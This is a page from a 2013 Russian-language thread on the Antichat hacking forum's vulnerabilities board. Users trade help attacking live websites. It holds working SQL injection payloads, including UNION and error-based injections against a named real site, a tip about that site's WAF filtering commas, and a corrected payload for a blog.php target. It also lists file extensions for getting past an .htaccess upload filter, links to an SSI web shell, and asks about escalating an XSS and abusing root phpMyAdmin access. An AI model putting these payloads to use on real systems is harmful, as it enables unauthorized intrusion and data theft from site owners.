HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2205 из 2422 « Первая < 12051705210521552195 2201 2202 2203 2204 2205 2206 2207 2208 2209 221522552305 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.04.2013, 22:11
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию
Цитата:
Сообщение от qaz  
Такой вопосец
.htaccess не пропускает файлы с таким разширением
(tpl\.html|php|php3|php4|php5|phtml|pl|cgi)
мб есть какиенибуть разширения исполняющие php код?
shtml, py

Цитата:
Сообщение от qaz  
php не выполняет
http://ahack.ru/releases/ssi-web-shell.htm
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 21.04.2013, 22:27
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию
Цитата:
Сообщение от Always  
http://odnadoma.ru/?part_id=500 ORDER BY 10 -- TRUE
http://odnadoma.ru/?part_id=500 ORDER BY 1 -- FALSE
http://odnadoma.ru/?part_id=500 UNION SELECT 1 -- ОТСОС
В ЧЕМ ПРОБЛЕМА?
Просто нет вывода

http://odnadoma.ru/?part_id=500+and+1=2+union+select+unhex(hex(123))+--+

UPD. Тут WAF прикольный кстати )

Фильтруются запятые, учти это.
 
Ответить с цитированием

  #3  
Старый 22.04.2013, 03:53
exstreme
Новичок
Регистрация: 23.02.2013
Сообщений: 14
С нами: 6956246

Репутация: 0
По умолчанию
Можно как-то раскрутить такую XSS

Код:
В XSSHERE можно вставлять код, "/{} экранируется, ();' не экранируется.
 
Ответить с цитированием

  #4  
Старый 23.04.2013, 02:53
semolod91
Новичок
Регистрация: 15.04.2013
Сообщений: 7
С нами: 6882806

Репутация: -10
По умолчанию
нашел в плагинах браузера уязвимости через спецальный тул но не знаю как их выъявить.

сервис показывает что есть 2 уязвимости но не говорит в каких. даже если нашел в каких, как можно найти где уязвимость?

пс. как найти уязвимость в программном коде?
 
Ответить с цитированием

  #5  
Старый 23.04.2013, 05:56
herfleisch
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
С нами: 9126697

Репутация: 97
По умолчанию
Цитата:
Сообщение от semolod91  
нашел в плагинах браузера уязвимости через спецальный тул но не знаю как их выъявить.
сервис показывает что есть 2 уязвимости но не говорит в каких. даже если нашел в каких, как можно найти где уязвимость?
пс. как найти уязвимость в программном коде?
Линки в студию.
 
Ответить с цитированием

  #6  
Старый 23.04.2013, 11:23
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию
Разобрался
 
Ответить с цитированием

  #7  
Старый 23.04.2013, 14:26
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
С нами: 9228480

Репутация: 0
По умолчанию
Есть уязвимость типа

blog.php?id=1+OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(user(), 1, 63), FLOOR(RAND(0)*2))) --

ответ:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 6

нет вывода user(), что делать?

Как раскрутить?
 
Ответить с цитированием

  #8  
Старый 23.04.2013, 14:52
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от Sanic1977  
Есть уязвимость типа
blog.php?id=1+union+select+1,user()+--+
ответ:
SELECT ... FROM utils.post WHERE 1=1 AND id IN (1 union select 1) ORDER BY date DESC - mysql problem - conn id : Resource id #44
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1) ORDER BY date DESC' at line 6
Как раскрутить?
blog.php?id=1)+union+select+1,user()+--+
 
Ответить с цитированием

  #9  
Старый 23.04.2013, 15:32
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
С нами: 9228480

Репутация: 0
По умолчанию
Спасибо, за помощь

Пишу в уязвимости:

blog.php?id=25628)and(select 1 from(select count(*),concat(concat(user()),floor(rand(0)*2))x from(select 1 union select 2 union select 3)z group by x)a) --

ответ:

Every derived table must have its own alias

что это может быть?

как раскрутить?
 
Ответить с цитированием

  #10  
Старый 23.04.2013, 18:44
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами: 9078977

Репутация: 34
По умолчанию
В общем есть root phmyadm с file_priv, есть phpinfo. Папок с правами на запись не нашел, какие есть варианты кроме как искать lfi?
 
Ответить с цитированием
Ответ
Страница 2205 из 2422 « Первая < 12051705210521552195 2201 2202 2203 2204 2205 2206 2207 2208 2209 221522552305 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.